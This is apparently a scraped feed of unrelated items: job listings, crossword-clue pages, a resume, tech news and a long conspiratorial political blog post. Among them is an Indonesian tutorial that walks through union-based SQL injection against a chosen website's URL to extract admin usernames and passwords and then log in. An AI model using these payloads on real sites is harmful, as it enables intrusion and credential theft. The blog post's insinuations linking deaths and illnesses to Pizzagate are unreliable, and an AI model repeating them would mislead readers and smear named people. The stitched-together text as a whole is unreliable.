Hourly Paid Teacher in Web and Database Programming ACS/AEC – LEA.2B - Vanier College - Vanier, QC   
INTENSIVE DAY PROGRAM – MEQ 22 PHASE 2 In the following discipline: 420 Computer Science 420-984-VA Advanced Programming in Java (45 hours) 420-987-VA...
From Vanier College - Tue, 13 Jun 2017 16:45:32 GMT - View all Vanier, QC jobs
          Blog>> Presentations at KM World and Taxonomy Bootcamp Washington DC 2016   
Here are the slides for a bunch of presentations at KM World and Taxonomy Bootcamp Washington DC 2016: Dave Clarke and Maish Nichani (keynote): Searching outside the box Dave Clarke and Gene Loh: Linked Data: the world is your database Patrick Lambe (workshop): Taxonomies and facet analysis for beginners Patrick Lambe (workshop): Knowledge mapping: identifying and mitigating knowledge risks
          Comment on dbms_sqldiag by Mark Jefferys   
Hi Jonathan, This statement is not correct: "One of the enhancements that appeared in 12c for SQL Baselines was that the plan the baseline was supposed to produce was stored in the database so that Oracle could check that the baseline would still reproduce the expected plan before applying it." This new stored plan is not used to check that the reproduced plan matches the expected plan before applying it; the enhancement (in Bug 12588179) was added only to improve diagnostics by having DBMS_XPLAN report the original plan rather than the reproduced plan. Note that the reproduced plan has always been checked against the expected plan since 11.1 via the plan_id. 12c does the same. Mark Jefferys Oracle Support
          Great post on the RNC AWS file leak discovery from UpGuard   
UpGuard’s post on their discovery of the RNC data is trending big time on the netsec subreddit. I highly recommend going to read the post if you want to know what they found. But in a nutshell, it all centers around the misconfiguration of permissions to the AWS S3 bucket where the database was stored. …

Read More Read More

          Administrative Assistant III   
TX-Dallas, Job Description: Advanced administrative responsibilities include preparation of more complex reports/presentations and analysis using various software packages and databases. Is considered a specialist in the department or division, responsible for a complete process of complex nature. Duties will include determining methods and procedures used to accomplish tasks. Hours: 8:00am to 5:00pm Work We
          GreenPlum Developer   
TX-Dallas, Position: GreenPlum Developer Location: Dallas, TX Duration: FULL TIME Salary: Open Description: Minimum of 5 years experience in distributed application development and system analysis. Hands on exp on GreenPlum Database Experienced in RDBMS – like Oracle Experience in Oracle development (PL/SQL Procedures and Functions, Triggers, Table and Record type variables advance PL/SQL) Experienced in wri
          China introduces a communist tablet: the Red Pad [... at a non-proletarian price of US$1,600]   
January 20, 2012
By Molly McHugh
Digital Trends

The extremely expensive tablet will marketed specifically towards party officials.

If you thought iPads were expensive, think again. A new Chinese tablet called the Red Pad will cost $1,600 dollars, but not just anyone can buy it, even if you do have the money.

After heavy criticism over its price from Chinese consumers, marketing and advertising featuring the Red Pad seemingly disappeared. Now, the Economic Times is saying that the manufacturer will only sell the tablet to bureaucrats and not the public. Originally the device was going to be available for anyone with the money (or the ability to subsidize the purchase), but the public backlash was so strong, the manufacturers decided to change its marketing tactics. It now looks like some back-pedaling occurred, and as a result the tablets availability will be limited to only Party officials.

But it’s not only the cost that will appeal to party members either. The Red Pad is specifically built to cater to their needs: the tablet from Red Pad Technology (which is supposedly in cahoots with the country’s Ministry of Information Industry) comes packaged with government database access and integration with the communist mouthpiece website, People’s Daily.

What’s possibly most amusing about the Red Pad is its operating system. The 9.7-inch Red Pad uses the Android OS, which is surprising considering China’s ongoing issues with Google. Aside from its ironic use of this platform and outrageous price, the Red Pad is similar to any other tablet: it features an A9 dual core processor, Wi-Fi and 3G support, 16GB of flash storage, with a sub 10-inch touchscreen display.

Last month we heard that a personalized iPad application was being developed for UK Prime Minister David Cameron. The supposed app would give him immediate access to government affairs and news. While the degree of this app has been questioned (it’s possible it’s merely a secure, Flipboard-like portal to this data), it’s clear that government leaders have become taken with tablets.

          Software Development Resume   

Samuel Abebe

        12028 NE 8th St,Bellevue, WA 98005

  • 4 years experience in full SDLC with multi-tiered architectures with C#, ASP.NET and ADO.NET.
  • 4+ years experience in web application development using different web technologies.
  • 4 years experience in designing, implementing and optimizing relational databases and working on stored procedure, triggers and views with SQL Server.
  • 3 years MS SQL Server Integration and Reporting Services (SSIS and SSRS).
  • 3 years of experience in HTML, DHTML, XHTML, JavaScript, JQuery, AJAX, CSS, XML, XSL, XSLT, XPATH.
  • 3 years of experience in writing Test Plan, Test Case Development and Test Automation.
  • Experience in functional, Unit, Integration, System, performance, Stress, Regression, Black box, White box, Localization, Globalization and UI Testing.
  • 1+ year experience in latest .NET technologies WCF, WPF, LINQ, and Silverlight.
  • In-depth knowledge of data Structures, algorithms, and design patterns. Strong analytical skills with ability to work independently or in a team environment
  • Highly innovative and adaptive learner, able to quickly grasp complex systems and identify areas of possible improvement.

LanguagesC#, Java, C++,ASP.NET, ADO.NET, Java EE, WCF, WPF , LINQ, Silverlight
DatabaseSQL Server 2005/08, SSIS, SSAS, SSRS, Optimization
Web/App ServerASP.NET, JavaScript, XHTML, CSS, AJAX, Silverlight
IDEVisual Studio, SQL Server Mgt Studio, Eclipse, Net Beans
OtherRational Unified Process (RUP), Agile, Rational Rose , UML, IIS, Tomcat, Crystal Reports, Power Shell, NUnit , JUnit, MVC


Software Engineer
Global Knowledge Initiative, Washington DC, USA     01/2010- 10/2010
The Global Knowledge Initiative is an NGO which build global knowledge partnerships between individuals and institutions of higher education and research. They help partners access the global knowledge, technology, and human resources needed to sustain growth and achieve prosperity for all.

Involved in a team of three on migrating and upgrading the organization site to build a dynamic from the existing static website. Responsibilities: 
  • Designed and implemented the user interface.
  • Maintained, updated, and enhanced the organization site.
  • Designed and implemented the relational database
  • Writing Test Plan, Test Case Development and Test Automation.
  • Functional, Integration, performance, Stress, Regression, Black box, White box, and UI Testing. 
Technical Environment: C#, ASP.Net, Silver light, Visual Studio 2008, SQL Server 2008, Visio, HTML, XML, Java script, CSS, IIS and  FileZilla.

Software Engineer
“HAFSAM P.L.C” Garment Shopping Company, Addis Ababa, Ethiopia     09/2007- 05/2008
Involved in a team of three on design and implementation of e-Commerce website to enable users to shop online for traditional clothing they like. The customers will search through company’s inventory by different categories, add the item to shopping cart and, finally, check out. Responsibilities:
  • Designed the management of administrative tasks, such as pricing and discounts when needed, upload images of clothes and manage orders status
  • Implemented creation of a profile for users and set up a username and password
  • Implemented feature for users to step through the shopping process such as searching for products, add or delete items to shopping cart, and finally check out
  • Implemented feature for users to check out and asked for their billing, shipping and payment method information. 
Technical Environment:   C#, ASP.Net, ADO.NET, SQL Server, HTML, XML, JavaScript, CSS and Visio.

Software Engineer
NIB International Bank, Addis Ababa, Ethiopia     01/2005- 08/2007
Involved in a development of banking application used to cut down communication gap between the bank and its customers. The customers can directly communicate with the bank online with the user friendly interfaces. The application handles online money transactions by the customer which includes withdrawal, deposit and money transfers to another account, and accessing online statements. Responsibilities:
  • Participated in the design of use case, association, class and activity diagrams using UML
  • Worked on  creation of  .Net framework customized classes that would be used later for the application
  • Worked on the SQL queries, stored procedures & functions using SQL server
  • Prepared Test plan, Test cases and other documentations.
  • Used Nunit for our unit test cases.
  • Functional, Unit Testing, Integration Testing, Stress, Performance and UI Testing.
Technical Environment:  C#, ASP.Net, SQL Server, ADO.NET, Rational Rose, HTML, Java Script, CSS, and XML.


Master of Science in Computer Science                                         May 2008 – Jan 2010 Maharishi University of Management, Fairfield, Iowa                                          Bachelor of Science in Computer Science                                       Sept 2000 - Jan 2005 Addis Ababa University, Addis Ababa, Ethiopia

          How A Contractor Exploited A Vulnerability In The FCC Website   
RendonWI writes: A Wisconsin wireless contractor discovered a flaw in the FCC's Antenna Structure Registration (ASR) database, and changed the ownership of more than 40 towers from multiple carriers and tower owners into his company's name during the past five months without the rightful owners being notified by the agency, according to FCC documents and sources knowledgeable of the illegal transfers. Sprint, AT&T and key tower companies were targeted in the wide-ranging thefts... Changing A ...
          Online chess   
Browser based online chess with database, forums and links.
          Rivendell: El software libre para broadcasters   
Parece que se le viene la competencia al Audicom 7, ya que Rivendell, un software de código abierto para ser usado por los broadcaster que usan el sistema operativo GNU/Linux , tiene similitud con este programa ya que sirve de manager, editor y programador de canciones. Les dejamos con algunas características interesantes. Editor de audio : Permite cortar audio dentro y fuera del aire. Además tiene un buen editor que permite establecer el punto In y Out, así como los fade. Herramienta fundamental en las radios.

Continuar leyendo para leer todo el artículo

CD Ripper
: Herramienta que importa canciones de CD's y que evita que el usuario tipee manualmente el artista y el álbum. Además regula el volumen de las canciones (dB) y modificar los canales de salida. También puede usarse en pantallas touch-screen. Amplio soporte para Live assist, con múltiples paneles de sonido disponible para usarse con el dedo. Soporta los formados de sonido PCM y MPEG Layer.

Ventanas de ayuda (Logs): Aparte de tener una interfaz simple y amigable, Rivendell posee 2 logs auxiliares . Función manual y automática para reproducciones de música. Configuración de pausas y stop en el transcurso la programación. Además es compatible con audio analógico y digital

Panel de control: Desde una computadora se puede administrar a otras 3 en diferentes cabinas por el panel de Rivendell. Lo resaltante de esto es que tiene una base de datos Backup que permite hacer copias de todos los archivos con solo presionar un botón y recuperar los perdidos con el sistema Restore database.

Especificaciones técnicas: Se necesitará como mínimo un CPU Pentium 4,256 MB de memoria RAM, sistema operativo Linux Professional 9.x, adaptador de audio AudioScience y como opcional un monitor de pantalla táctil para economizar el trabajo del dj o locutor. No estaría mal descargar uno de estos softwares ya que es muy útil, práctico y sobre todo, gratuito.

Web principal: Rivendell
Area de descargas: link
          A bit of skill at the piano   

Searching our database for: A bit of skill at the piano crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query A bit of skill at the piano that you searched for. Kindly check the possible answer below and […]

The post A bit of skill at the piano appeared first on DailyCrosswordSolver.co.uk.

          Fishy temptation?   

Searching our database for: Fishy temptation? crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Fishy temptation? that you searched for. Kindly check the possible answer below and if it’s not what you are looking for then use […]

The post Fishy temptation? appeared first on DailyCrosswordSolver.co.uk.

          Car parts one tires of mentioning?   

Searching our database for: Car parts one tires of mentioning? crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Car parts one tires of mentioning? that you searched for. Kindly check the possible answer below and if it’s […]

The post Car parts one tires of mentioning? appeared first on DailyCrosswordSolver.co.uk.

          Traveller backed up by Damon   

Searching our database for: Traveller backed up by Damon crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Traveller backed up by Damon that you searched for. Kindly check the possible answer below and if it’s not what […]

The post Traveller backed up by Damon appeared first on DailyCrosswordSolver.co.uk.

          In America, it makes labour more costly   

Searching our database for: In America, it makes labour more costly crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query In America, it makes labour more costly that you searched for. Kindly check the possible answer below and […]

The post In America, it makes labour more costly appeared first on DailyCrosswordSolver.co.uk.

          In the reading room, it would be disquieting   

Searching our database for: In the reading room, it would be disquieting crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query In the reading room, it would be disquieting that you searched for. Kindly check the possible answer […]

The post In the reading room, it would be disquieting appeared first on DailyCrosswordSolver.co.uk.

          Go round or up to an art gallery   

Searching our database for: Go round or up to an art gallery crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Go round or up to an art gallery that you searched for. Kindly check the possible answer […]

The post Go round or up to an art gallery appeared first on DailyCrosswordSolver.co.uk.

          Member of the college faculty   

Searching our database for: Member of the college faculty crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Member of the college faculty that you searched for. Kindly check the possible answer below and if it’s not what […]

The post Member of the college faculty appeared first on DailyCrosswordSolver.co.uk.

          Oh, him with the joyous expression!   

Searching our database for: Oh, him with the joyous expression! crossword clue answers and solutions. This crossword clue was seen today at Evening Standard Cryptic Crossword June 29 2017. Found 1 possible solution matching the query Oh, him with the joyous expression! that you searched for. Kindly check the possible answer below and if it’s […]

The post Oh, him with the joyous expression! appeared first on DailyCrosswordSolver.co.uk.

          SQL Injection Melalui URL   
Udah pada tahukan sql injection itu apa? Kalau yang belum tahu langsung cabut aja dulu ke wikipedia / google gan.. :D

Ok, buat yang udah tahu apa itu sql injection tapi masih bingung caranya. Nih saya share disini..

Pertama-tama mari siapkan :
  1. Target yang akan dituju (bisa di cari di google, bing, dll)
  2. Segelas air putih (biar ga dehidrasi di depan komputer yang panas.. hehe)

Langsung aja ya..
Kalau begitu pertama kita cari targetnya, misalkan http://www.target.com/news.php?id=1
Nah kita tambahkan kutip satu di belakang angka 1 untuk mengetahui apakah web tersebut vulnerable dengan sql injection atau tidak.
Nanti urlnya jadi begini http://www.target.com/news.php?id=1'

Lihat apakah muncul error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax
Kalau muncul error seperti di atas, berarti web tersebut vulnerable. :D

Selanjutnya kalau sudah vulnerable kita lanjutkan dengan mengubah url menjadi http://www.target.com/news.php?id=-1+order+by+1--
Cek apakah terdapat error lagi atau tidak, kalau tidak lanjutkan dengan mengganti angka 1 yang dibelakang dengan angka 2 dst..
Misalkan terdapat error di angka 5, berarti kita ambil angka 1, 2, 3, dan 4 untuk langkah berikutnya..

Sekarang ubah url menjadi http://www.target.com/news.php?id=-1+union+select+1,2,3,4-- untuk melihat angka ajaib yang keluar.. :D
Jika yang keluar angka 3, maka kita ganti angka 3 tersebut menjadi @@version atau version() untuk mengetahui versi mysql yang di gunakan : http://www.target.com/news.php?id=-1+union+select+1,2,@@version,4--

Kalau versi mysqlnya 4 kita tinggalkan saja dan cari web yang baru, tapi kalau versi 5 kita lanjut bang.. :D

Kita sudah tahu versi mysqlnya adalah 5, jadi sekarang kita ubah kembali urlnya menjadi
untuk mengetahui tabel-tabel yang ada di web tersebut.

Jika nama tabelnya sudah keluar, kalian cari mana yang mencurigakan dari namanya. Misalkan kita dapat "admin_log" tanpa kutip.

Kita buka tabel tersebut dengan mengganti group_concat(table_name) menjadi group_concat(column_name) dan information_schema.tables menjadi information_schema.columns lalu table_schema=database() menjadi table_name=admin_log tapi "admin_log" harus di convert dulu ke bilangan hexadesimal dan tambahkan 0x di depan hasil convertnya.
Misalkan hexadesimal admin_log adalah 12345, menjadi 0x12345.

Lihat nama apa saja yang keluar, misalkan "admin,pass".
Kita buka saja isi dari column itu untuk mengetahui username dan password adminnya.. :D
Kita ubah group_concat(column_name) menjadi group_concat(admin,0x23,pass) dan information_schema.tables+where+table_name=0x12345 menjadi admin_log.

Dengan begitu keluarlah semua username dan passwordnya.
Sekarang kalian tinggal mencari halaman login untuk adminnya saja.., tapi ingat jangan disalah gunakan ya.. ;)

Semoga bermanfaat.. ^_^


本連載では、データベースセキュリティの「考え方」と「必要な対策」をおさらいし、Oracle Databaseを軸にした「具体的な実装方法」や「Tips」を紹介していきます。今回は、あらためて「なぜ、データベースセキュリティが必要なのか」を説明します。

          Data Resource Profile: The French National Uniform Hospital Discharge Data Set Database (PMSI)   
          Spy vs Spy: Stuck in the Funhouse   

Funhouses are only fun when you can leave them. When the distorting mirror images become your new, day-to-day reality construct, then it's not so much fun anymore. 

I dreaded the 2016 Election because I had a very strong feeling that no matter who won we'd be plunged into a dystopian paradigm in which major power blocs would erupt into all-out warfare. And I sensed that neither Trump nor Clinton possessed the political skills or the communicative powers to keep the carnage fully out of our view. Or our path.

And I was right.

Trump's only been in office for a little over two months and I'm exhausted already. I'm certainly not alone in this. It all feels like a TV sitcom in its seventh season, well after the writers ran out of story ideas. The shark has been good and jumped. And the ratings (the approval ratings, in this case) are plunging too.

What is truly demoralizing though is the utter transparency of the secret war playing out, the seemingly endless spy vs spy thrust and counter-thrust, and the obvious deceptions. Even more so is the Animal Farm-like metamorphosis of the Democratic Party into a full-blown, funhouse mirror of McCarthy-era Republicans, but with Glenn Beck-worthy conspiracy theories thrown in for good measure.

I don't know about you but all of a sudden the world seems especially cold, hard, gray, harsh. Masks are coming off, velvet gloves tossed into wastebins. It doesn't seem to matter who wins the scorpion fight, you're still stuck with a scorpion.  

We can't call out the play-by-play because it's largely being acted out behind closed doors. But we can look at the collateral damage and make certain speculations. There's no doubt that it would all be just as bad-- probably worse-- if Hillary won. Even so, this all feels especially grating.

You've probably seen this story:
Conspiracy theorist Alex Jones on Friday apologized to the owner of a Washington pizzeria that became the subject of a conspiracy theory about human trafficking last year. 
Pizza shop Comet Ping Pong was thrust into the spotlight last year after a gunman allegedly fired a shot inside the restaurant. The suspect said he was investigating the unsubstantiated conspiracy theory that Hillary Clinton and her campaign chairman, John Podesta, were operating a child sex trafficking ring out of the restaurant. 
The theory, which became known as Pizzagate, had circulated among far-right conspiracy theory websites and social media accounts. 
“In our commentary about what had become known as Pizzagate, I made comments about Mr. Alefantis that in hindsight I regret, and for which I apologize to him,” Jones, who runs Infowars, said in a video. James Alefantis is the owner of Comet Ping Pong. 
Jones said his website relied on reporters who are no longer employed by Infowars and that video reports about Pizzagate were removed from the website. He also invited Alefantis onto the show to discuss the incident.
It was preceded by this story:
According to McClatchy News, the FBI’s Russian-influence probe agents are exploring whether far-right news operations, including the pro-Donald Trump sites Breitbart News and Infowars, “took any actions to assist Russia’s operatives.”  Trump’s ousted national security adviser Michael Flynn and his son, a member of the Trump transition team, were among those who boosted the so-called “PizzaGate” pedophile conspiracy theory.
I doubt this will quell the fervor among the Pizzagaters on sites like 4chan and Voat. Given the suspicion many on the fringes regard Jones with it may in fact give the flagging movement a fresh jolt. Jones' apology may also have to do with the drive to purge YouTube of "extremist" content and the controversy over the use of advertising on videos corporate clients find objectionable. A World without Sin, as our Gordon might put it. 

Washington Post headline, pre-election.

So much for theories that the FBI was ready to make mass arrests of prominent Washington figures related to Pizzagate.  Has any "mass arrest" Internet story ever panned out?  

Maybe it has:
Donald Trump became president on Jan. 20. And in one short month, there were more than 1,500 arrests for sex crimes ranging from trafficking to pedophilia.  
Big deal? You bet. In all of 2014, there were fewer than 400 sex trafficking-related arrests, according to FBI crime statistics. Liz Crokin at TownHall.com has put together a great piece on the push by the Trump administration to crack down on sex crimes. And she notes that while "this should be one of the biggest stories in the national news... the mainstream media has barely, if at all, covered any of these mass pedophile arrests. This begs the question – why?
This may have nothing to do with Trump-- in fact, it's likely it doesn't-- since these kinds of actions are planned out months in advance. The arrests continue, in case you were wondering, with major busts going down on a near-weekly basis. Someone's cleaning house. 

For what it's worth, I always reckoned that Pizzagate was in fact cover/distraction for a more hidden struggle, one that would take place under the radar*. As I noted back in November:

No one is saying as much but this very much feels connected to a deeper, more covert war. 
Why would I say such a thing? Because at the same time the Pizzagate story went dark we've seen major strikes taken against international pedophilia, which actually is a global conspiracy, with its own networks, secret codes and moles within established centers of power such as schools, police departments and governments.  
With such combustible accusations-- and such potential for a scandal that could quickly spread out of control (ie., involve political figures you're not trying to destroy)-- you'd naturally expect the action to go dark and the fall guys to be placed pretty far down the foodchain. (Remember that a prior investigation bagged one of the most powerful people in Washington at one time, former Speaker of the House Dennis Hastert).†


It may be sheer coincidence, but James Alefantis' former partner suffered a major heart attack this week
Media Matters for America founder David Brock was rushed to a hospital on Tuesday after suffering a heart attack. 
According to a press release from MMA, the founder of the liberal media watchdog and analysis website was rushed to the hospital early Tuesday afternoon and received treatment.
Sure, it may be coincidence. But I couldn't help but remember this story, published soon after the election
Dems to David Brock: Stop Helping, You Are Killing Us 
Democrats know they need someone to lead them out of the wilderness. But, they say, that someone is not David Brock.

As David Brock attempts to position himself as a leader in rebuilding ademoralized Democratic Party in the age of Trump, many leading Democratic organizers and operatives are wishing the man would simply disappear.
"Disappear." Huh. 
Many in the party—Clinton loyalists, Obama veterans, and Bernie supporters alike—talk about the man not as a sought-after ally in the fight against Trumpism, but as a nuisance and a hanger-on, overseeing a colossal waste of cash. And former employees say that he has hurt the cause.
It's worth remembering that Breitbart.com Andrew Breitbart died of a heart attack at the age of 43. A year before he'd posted a cryptic tweet that some have since linked to the Pizzagate imbroglio.  Just before his death he hyped some revelation about Barack Obama's past. 

A coroner in the office handling Breitbart's body subsequently died of arsenic poisoning. The day Breitbart's autopsy results were revealed, in fact.


We also saw James Comey revive Russiagate, which had been flatlining after Vault 7. Any illusions among Trump fans that the FBI was secretly on their side were ground into powder, between this revelation and the Pizzagate conspiracy investigations. 

One can't help but wonder if the New Praetorians (I've noticed that the Praetorian meme has been picked up by more prominent commentators, but you heard it here first) are losing their last shred of patience with Donald Trump's shenanigans and are planning imminent regime change: 
WASHINGTON (AP) — The FBI is investigating whether Donald Trump’s associates coordinated with Russian officials in an effort to sway the 2016 presidential election, Director James Comey said Monday in an extraordinary public confirmation of a probe the president has refused to acknowledge, dismissed as fake news and blamed on Democrats. 
In a bruising five-hour session, the FBI director also knocked down Trump’s claim that his predecessor had wiretapped his New York skyscraper, an assertion that has distracted White House officials and frustrated fellow Republicans who acknowledge they’ve seen no evidence to support it.
How surreal is the world in which you know live in? So much so that mainstream political site The Hill is comparing the action in Washington to a Stanley Kubrick film, one which has become notorious for the conspiracy theories that have been projected onto it (and is well familiar to Synchronauts):
On the 40th anniversary of the publication of The Shining, Stephen King must be wondering if Washington is working on its own sequel. For the last couple months, Washington has been on edge, like we are all trapped in Overlook Hotel with every day bringing a new “jump scare,” often preceded by a telltale tweet. Indeed, a Twitter whistle has replaced suspenseful music to put the entire city on the edge of their seats. 
In this Shining sequel, however, people are sharply divided on who is the deranged ax-wielding villain in this lodge, the president or the press. Ironically, with the recent disclosure that some of the Trump campaign may indeed have been subject to surveillance, the president is looking more like Danny Torrence, a character dismissed for constantly muttering “redrum, redrum” until someone finally looked in a mirror at the reverse image to see the true message.
Yeah, I'm not really feeling that metaphor there, but whatever. It's been that kind of year.

Now the Internet is burning up with theories that disgraced National Security Adviser Michael Flynn has "turned" and is going to testify against the Trump Administration, or at least figures attached to it. 

It's hard to imagine a three-star general can be stupid enough to be guilty of things Flynn's been accused of but that may speak to a culture of impunity in Washington, in which your misdeeds are only punished if you get on the wrong side of the wrong people.


One wonders if the secret war has spread outside Washington. Car service giant Uber seems to be having a major run of rotten luck lately: 
Uber Technologies Inc. is suspending its self-driving car program after one of its autonomous vehicles was involved in a high-impact crash in Tempe, Arizona, the latest incident for a company reeling from multiple crises. 
In a photo posted on Twitter, one of Uber’s Volvo self-driving SUVs is pictured on its side next to another car with dents and smashed windows. An Uber spokeswoman confirmed the incident, and the veracity of the photo, and added that the ride-hailing company is suspending its autonomous tests in Arizona until it completes its investigation and pausing its Pittsburgh operations.

The incident also comes as Uber, and Chief Executive Officer Travis Kalanick, are currently under scrutiny because of a series of scandals. The ride-hailing company has been accused of operating a sexist workplace. This month, the New York Times reported that Uber used a tool called Greyball to help drivers evade government regulators and enforcement officials. Kalanick said he needed "leadership help" after Bloomberg published a video showing him arguing with an Uber driver.
So who did Kalanick piss off? 

Coincidentally- there's that word again- the crash comes soon after Wikileaks revealed that CIA hackers had the ability to override the computer systems in automobiles. From Mashable:

WikiLeaks has published a trove of files it says are linked to the CIA's hacking operations — which apparently includes efforts to hack into cars.  
The first in a series called "Vault 7," "Year Zero" supposedly comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virginia.  
"Year Zero" details the CIA's malware arsenal and "zero day" exploits against Apple iPhones, Google's Android operating system, Microsoft Windows and even Samsung TVs.  
 According to a document from 2014, the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks. 
Oh, that's reassuring. Speaking of control systems, apparently pimps are controlling prostitutes with RFID chips:
It turns out this 20-something woman was being pimped out by her boyfriend, forced to sell herself for sex and hand him the money. 
 “It was a small glass capsule with a little almost like a circuit board inside of it,” he said. “It's an RFID chip. It's used to tag cats and dogs. And someone had tagged her like an animal, like she was somebody's pet that they owned.” 
This is human trafficking. It’s a marginal issue here in the U.S. for most of us. Part of that is because the average person isn’t sure what human trafficking – or modern day slavery – actually means.
Technology is our friend, right? And now this: 
Turkish Hackers Threaten To Wipe Millions Of iPhones; Demand Ransom From Apple 
Today, courtesy of CIO, we learn that a group of hackers referring to themselves as the "Turkish Crime Family", has been in direct contact with Apple and is demanding a $150,000 ransom by April 7th or they will proceed to wipe as many as 600 million apple devices for which they allegedly have passwords. 
The group said via email that it has had a database of about 519 million iCloud credentials for some time, but did not attempt to sell it until now. The interest for such accounts on the black market has been low due to security measures Apple has put in place in recent years, it said.

Since announcing its plan to wipe devices associated with iCloud accounts, the group claimed that other hackers have stepped forward and shared additional account credentials with them, putting the current number it holds at over 627 million.

According to the hackers, over 220 million of these credentials have been verified to work and provide access to iCloud accounts that don't have security measures like two-factor authentication turned on.
Of course, if credible, with an ask of just $150k, this is the most modest group of hackers we've ever come across.
Given the war that's erupted between the increasingly aggressive Turkish government and the EU, money may clearly not be the object here. Turkish PM Erdogan is clearly set on reconstructing the old Ottoman Empire and shivving Apple might just be part of the march.

Besides, Turkey is taking that recent coup attempt-- which is almost universally blamed on the CIA-- very personally.

Speaking of the EU, we've seen stories that Trump advisor Steve Bannon wants to dissolve the union. Which may be why Trump-adversary John McCain announced his unalloyed support for it- and the "New World Order" (his words, not mine):
The world "cries out for American and European leadership" through the EU and Nato, US senator John McCain said on Friday (24 March). 
In a "new world order under enormous strain" and in "the titanic struggle with forces of radicalism … we can't stand by and lament, we've got to be involved," said McCain, a former Republican presidential candidate who is now chairman of the armed services committee in the US Senate. 
Speaking at the Brussels Forum, a conference organised by the German Marshall Fund, a transatlantic think tank, he said that the EU and the US needed to develop "more cooperation, more connectivity". 
"I trust the EU," he said, defending an opposite view from that of US president Donald Trump, who said in January that the UK "was so smart in getting out" of the EU and that Nato was "obsolete". 
He said that the EU was "one of the most important alliances" for the US and that the EU and Nato were "the best two sums in history", which have maintained peace for the last 70 years. "We need to rely on Nato and have a Nato that adjusts to new challenges," he said.
Would McCain speak this way to a domestic audience? Of course not. Or maybe he would- I can't tell which way is up anymore. But either way it's good to know where he really stands.

Like McCain, China continues to sound a similar note of support for globalization, on which its very economic survival so desperately depends:
Chinese Vice Premier Zhang Gaoli told a gathering of Asian leaders that the world must commit to multilateral free trade under the World Trade Organization and needs to reform global economic governance. 
“The river of globalization and free trade will always move forward with unstoppable momentum to the vast ocean of the global economy,” Zhang said. China will remain a strong force in the world economy and for peace and stability, he said, adding that countries must respect one another’s core interests and refrain from undermining regional stability. 
I suppose this is why China is off the target list for our new Cold (?) Warriors.

I've resisted posting on all this because it's all so depressing. I've actually written a few pieces on this chicanery that I ended up roundfiling. But I suppose I just wanted to go on the record about all this skullduggery, for posterity's sake.

UPDATE: Sex trafficking arrests and trials continue to proliferate. Most recent bust, an international ring in Minnesota. There is way too much activity going down in too short a time for this to be spontaneous.

* Which is exactly why I refrained from commenting on it here for the most part, instead noting that it had become a kind of memetic virus in much the same way that the Franklin/Boy's Town scandal had in the 90s. (Note that prior to the election-- and Pizzagate-- Trump nemesis the Washington Post was all over the issue of sex trafficking in the nation's capital). 

† The ongoing legal and police actions coinciding with the moves to shut down the Pizzagate fringes on the Web seem like the exact kind of action one would expect if there were a serious operation at work. Shutting down the Internet chatter makes perfect sense in this context because it can only complicate cases made by prosecutors. 
          Effectiveness of motivational interviewing interventions on medication adherence in adults with chronic diseases: a systematic review and meta-analysis   
Background: Medication adherence is frequently suboptimal in adults with chronic diseases, resulting in negative consequences. Motivational interviewing (MI) is a collaborative conversational style for strengthening a person’s motivation and commitment to change. We aimed to assess whether MI interventions are effective to enhance medication adherence in adults with chronic diseases and to explore the effect of individual MI intervention characteristics.Methods: We searched electronic databases and reference lists of relevant articles to find randomized controlled trials (RCTs) that assessed MI intervention effectiveness on medication adherence in adults with chronic diseases. A random-effects model was used to estimate a pooled MI intervention effect size and its heterogeneity (I2). We also explored the effects of individual MI characteristics on MI intervention effect size using a meta-regression with linear mixed model.Results: Nineteen RCTs were identified, and 16 were included in the meta-analysis. The pooled MI intervention effect size was 0.12 [95% confidence interval (CI) = (0.05, 0.20), I2 = 1%]. Interventions that were based on MI only [β = 0.183, 95% CI = (0.004, 0.362)] or those in which interventionists were coached during intervention implementation [β = 0.465, 95% CI = (0.028, 0.902)] were the most effective. MI interventions that were delivered solely face to face were more effective than those that were delivered solely by phone [β = 0.270, 95% CI = (0.041, 0.498)].Conclusions: This synthesis of RCTs suggests that MI interventions might be effective at enhancing of medication adherence in adults treated for chronic diseases. Further research is however warranted, as the observed intervention effect size was small.

          Cohort Profile: Standardized Management of Antiretroviral Therapy Cohort (MASTER Cohort)   
MASTER in a nutshell
  • The Italian MASTER cohort is a hospital-based multicentre, open, dynamic HIV cohort which was set up to investigate mid- and long-term clinical outcomes, impact of therapeutic strategies and public health issues.
  • A total of 24 672 HIV-infected patients from eight Italian hospitals, aged 18 years and over, both treatment naïve and treatment experienced, were enrolled between 1986 and 2013.
  • Each patient underwent a routine check-up every 3–4 months. The cumulative probability of drop-out was 31.6% (95% CI: 30.8–32.5%) over the period 1998–2013; 12 022 subjects were still active on 31 December 2013.
  • The data set comprises demographic data and a wide range of clinical and laboratory data, and linkage to health databases.
  • MASTER data have been shared with a multinational cohort (COHERE), and MASTER is a supported access resource [www.mastercohort.it].

          Business Analyst - CSI Consulting Inc - Toronto, ON   
BUSINESS SYSTEM ANALYST (SUPPORT - FATCA & CRS). FATCA & CRS • Database related skills and knowledge - PL/SQL or basic SQL • Business and Technical Requirement...
From Indeed - Mon, 19 Jun 2017 19:40:15 GMT - View all Toronto, ON jobs
          Tall is the most efficient design   
Etobicoke South Completions this year; 2016

The congestion around Park Lawn and Lake Shore is set to MORE!

2016 Completions
